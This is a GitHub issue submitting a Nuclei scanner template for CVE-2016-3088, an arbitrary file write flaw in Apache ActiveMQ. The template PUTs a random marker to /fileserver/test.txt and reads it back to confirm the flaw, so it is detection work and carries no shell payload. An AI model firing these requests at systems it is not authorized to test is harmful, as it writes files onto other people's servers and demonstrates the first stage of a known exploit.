### ISSUE TITLE
[nuclei-template] CVE-2016-3088

### ISSUE THREAD

**Issue by FanqXu** [projectdiscovery/nuclei-templates#3087]
### Template Information:
reference:
  - https://www.exploit-db.com/exploits/40857
  - http://activemq.apache.org/security-advisories.data/CVE-2016-3088-announcement.txt

### Nuclei Template:

```yaml
id: CVE-2016-3088

info:
  name: ActiveMQ Arbitrary File Write Vulnerability (CVE-2016-3088)
  author: _0xf4n9x_
  severity: high
  description: The Fileserver web application in Apache ActiveMQ 5.x before 5.14.0 allows remote attackers to upload and execute arbitrary files via an HTTP PUT followed by an HTTP MOVE request.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2016-3088
    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3088
    - https://www.exploit-db.com/exploits/40857
    - http://activemq.apache.org/security-advisories.data/CVE-2016-3088-announcement.txt
  tags: fileupload

requests:
  - raw:
      - |
        PUT /fileserver/test.txt HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36
        Connection: close
        Content-Length: 27
        Accept: */*
        Accept-Language: en
        Accept-Encoding: gzip, deflate

        {{randstr}}

      - |
        GET /fileserver/test.txt HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
        Connection: close
        Accept: */*
        Accept-Language: en
        Accept-Encoding: gzip, deflate

    req-condition: true
    matchers:
      - type: dsl
        dsl:
          - "status_code_1==204"
          - "status_code_2==200"
          - "contains((body_2), '{{randstr}}')"
        condition: and

```
